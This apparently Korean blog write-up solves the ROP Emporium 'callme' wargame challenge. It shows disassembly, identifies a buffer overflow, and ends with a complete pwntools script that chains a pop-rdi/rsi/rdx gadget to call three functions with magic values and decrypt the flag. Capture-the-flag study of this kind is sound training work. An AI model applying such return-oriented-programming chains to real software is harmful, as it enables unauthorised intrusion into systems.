728x90
반응형

1. intro

2. code 및 분석

2.1.  code

usefulFunction

   0x00000000004008f2 <+0>:     push   %rbp
   0x00000000004008f3 <+1>:     mov    %rsp,%rbp
   0x00000000004008f6 <+4>:     mov    $0x6,%edx
   0x00000000004008fb <+9>:     mov    $0x5,%esi
   0x0000000000400900 <+14>:    mov    $0x4,%edi
   0x0000000000400905 <+19>:    call   0x4006f0 <callme_three@plt>
   0x000000000040090a <+24>:    mov    $0x6,%edx
   0x000000000040090f <+29>:    mov    $0x5,%esi
   0x0000000000400914 <+34>:    mov    $0x4,%edi
   0x0000000000400919 <+39>:    call   0x400740 <callme_two@plt>
   0x000000000040091e <+44>:    mov    $0x6,%edx
   0x0000000000400923 <+49>:    mov    $0x5,%esi
   0x0000000000400928 <+54>:    mov    $0x4,%edi
   0x000000000040092d <+59>:    call   0x400720 <callme_one@plt>
   0x0000000000400932 <+64>:    mov    $0x1,%edi
   0x0000000000400937 <+69>:    call   0x400750 <exit@plt>

usefulGadget

   0x000000000040093c <+0>:     pop    %rdi
   0x000000000040093d <+1>:     pop    %rsi
   0x000000000040093e <+2>:     pop    %rdx
   0x000000000040093f <+3>:     ret

callme_one (two, three 모두 비슷함)

   0x000000000000081a <+0>:     push   %rbp
   0x000000000000081b <+1>:     mov    %rsp,%rbp
   0x000000000000081e <+4>:     sub    $0x30,%rsp
   0x0000000000000822 <+8>:     mov    %rdi,-0x18(%rbp)
   0x0000000000000826 <+12>:    mov    %rsi,-0x20(%rbp)
   0x000000000000082a <+16>:    mov    %rdx,-0x28(%rbp)
   0x000000000000082e <+20>:    movabs $0xdeadbeefdeadbeef,%rax
   0x0000000000000838 <+30>:    cmp    %rax,-0x18(%rbp)
   0x000000000000083c <+34>:    jne    0x912 <callme_one+248>
   0x0000000000000842 <+40>:    movabs $0xcafebabecafebabe,%rax
   0x000000000000084c <+50>:    cmp    %rax,-0x20(%rbp)
   0x0000000000000850 <+54>:    jne    0x912 <callme_one+248>
   0x0000000000000856 <+60>:    movabs $0xd00df00dd00df00d,%rax
   0x0000000000000860 <+70>:    cmp    %rax,-0x28(%rbp)
   0x0000000000000864 <+74>:    jne    0x912 <callme_one+248>
   0x000000000000086a <+80>:    movq   $0x0,-0x8(%rbp)
   0x0000000000000872 <+88>:    lea    0x32f(%rip),%rsi        # 0xba8
   0x0000000000000879 <+95>:    lea    0x32a(%rip),%rdi        # 0xbaa
   0x0000000000000880 <+102>:   call   0x710 <fopen@plt>
   0x0000000000000885 <+107>:   mov    %rax,-0x8(%rbp)
   0x0000000000000889 <+111>:   cmpq   $0x0,-0x8(%rbp)
   0x000000000000088e <+116>:   jne    0x8a6 <callme_one+140>
   0x0000000000000890 <+118>:   lea    0x329(%rip),%rdi        # 0xbc0
   0x0000000000000897 <+125>:   call   0x6c0 <puts@plt>
   0x000000000000089c <+130>:   mov    $0x1,%edi
   0x00000000000008a1 <+135>:   call   0x720 <exit@plt>
   0x00000000000008a6 <+140>:   mov    $0x21,%edi
   0x00000000000008ab <+145>:   call   0x700 <malloc@plt>
   0x00000000000008b0 <+150>:   mov    %rax,0x2007a9(%rip)        # 0x201060 <g_buf>
   0x00000000000008b7 <+157>:   mov    0x2007a2(%rip),%rax        # 0x201060 <g_buf>
   0x00000000000008be <+164>:   test   %rax,%rax
   0x00000000000008c1 <+167>:   jne    0x8d9 <callme_one+191>
   0x00000000000008c3 <+169>:   lea    0x318(%rip),%rdi        # 0xbe2
   0x00000000000008ca <+176>:   call   0x6c0 <puts@plt>
   0x00000000000008cf <+181>:   mov    $0x1,%edi
   0x00000000000008d4 <+186>:   call   0x720 <exit@plt>
   0x00000000000008d9 <+191>:   mov    0x200780(%rip),%rax        # 0x201060 <g_buf>
   0x00000000000008e0 <+198>:   mov    -0x8(%rbp),%rdx
   0x00000000000008e4 <+202>:   mov    $0x21,%esi
   0x00000000000008e9 <+207>:   mov    %rax,%rdi
   0x00000000000008ec <+210>:   call   0x6f0 <fgets@plt>
   0x00000000000008f1 <+215>:   mov    %rax,0x200768(%rip)        # 0x201060 <g_buf>
   0x00000000000008f8 <+222>:   mov    -0x8(%rbp),%rax
   0x00000000000008fc <+226>:   mov    %rax,%rdi
   0x00000000000008ff <+229>:   call   0x6d0 <fclose@plt>
   0x0000000000000904 <+234>:   lea    0x2f1(%rip),%rdi        # 0xbfc
   0x000000000000090b <+241>:   call   0x6c0 <puts@plt>
   0x0000000000000910 <+246>:   jmp    0x928 <callme_one+270>
   0x0000000000000912 <+248>:   lea    0x301(%rip),%rdi        # 0xc1a
   0x0000000000000919 <+255>:   call   0x6c0 <puts@plt>
   0x000000000000091e <+260>:   mov    $0x1,%edi
   0x0000000000000923 <+265>:   call   0x720 <exit@plt>
   0x0000000000000928 <+270>:   nop
   0x0000000000000929 <+271>:   leave
   0x000000000000092a <+272>:   ret

 

2.2. 분석

main과 pwnme 함수는 역시 동일하다.

usefulGadget 및 usefulFunction이 제공되며,

usefulFunction 내에서는 callme_one, two, three를 호출한다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

buffer overflow

3.2. 공격 준비

제공되는 파일은 모두 아래와 같다.

┌[wyv3rn🐲]-(~/rop)
└> ls
callme  encrypted_flag.dat  key1.dat  key2.dat  libcallme.so

위의 코드와 함께 보면 느낌이 빡 온다.

callme_one / two / three를 호출하면 flag가 decrypt 될 것이라는 느낌이.

 

callme_one만 보면, rdi, rsi, rdx의 값을 특정 값을 비교해서 맞으면 복호화해준다.

나머지 함수도 마찬가지로 이를 맞춰 호출해주면 된다.

 

4. exploit

from pwn import *

p = process('./callme')

one = 0x400726
two = 0x400746
three = 0x4006f6

gadget = 0x000000000040093c #rdi rsi rdx ret

pay = b'A'*8*5
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(one)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(two)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(three)

p.sendlineafter(b'> ',pay)

p.interactive()
728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Wargame > ROP Emporium' 카테고리의 다른 글

fluff  (0) 2023.07.07
badchar  (0) 2023.07.07
write4  (0) 2023.07.07
split  (0) 2023.07.07
ret2win  (0) 2023.07.07

티스토리툴바